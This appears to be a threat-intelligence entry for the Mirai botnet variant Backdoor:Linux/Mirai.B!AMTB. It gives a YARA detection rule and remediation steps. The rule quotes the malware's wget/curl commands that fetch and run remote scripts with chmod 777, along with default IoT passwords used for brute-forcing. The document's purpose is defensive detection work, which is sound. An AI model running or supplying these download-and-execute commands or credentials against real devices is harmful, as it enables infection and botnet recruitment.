Concrete signature match: Backdoor - Provides unauthorized remote access for Linux platform, family Mirai
This threat is a concrete detection of Backdoor:Linux/Mirai.B!AMTB, a variant of the Mirai botnet designed to infect Linux-based systems, often targeting IoT devices. It establishes a backdoor, maintains persistence through lock files, and is programmed to download and execute additional malicious scripts from command-and-control (C2) servers. The botnet is known for credential brute-forcing and launching Distributed Denial of Service (DDoS) attacks.
Relevant strings associated with this threat:
rule Backdoor_Linux_Mirai_B_2147956509_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "Backdoor:Linux/Mirai.B!AMTB"
        threat_id = "2147956509"
        type = "Backdoor"
        platform = "Linux: Linux platform"
        family = "Mirai"
        severity = "Critical"
        info = "AMTB: an internal category used to refer to some threats"
        signature_type = "SIGNATURE_TYPE_ELFHSTR_EXT"
        threshold = "5"
        strings_accuracy = "High"

    strings:
        $x_1_1 = "xmhdipc" ascii //weight: 1
        $x_1_2 = "/tmp/.bot_lock" ascii //weight: 1
        $x_1_3 = "cd /root wget http://%s/cat.sh" ascii //weight: 1
        $x_1_4 = "wget http://%s/run.sh; curl -O http://%s/run.sh; chmod 777 run.sh" ascii //weight: 1
        $x_1_5 = "7ujMko0admin" ascii //weight: 1
        $x_1_6 = "udpplain" ascii //weight: 1

    condition:
        (filesize < 20MB) and
        (5 of ($x*))
}

Immediately isolate the compromised Linux system from the network. Conduct a thorough scan with an updated EDR/antivirus solution to fully remove the Mirai binary and any associated persistence mechanisms. Change all compromised or default credentials, apply all available security patches to the operating system and applications, and implement network segmentation with egress filtering to prevent C2 communication.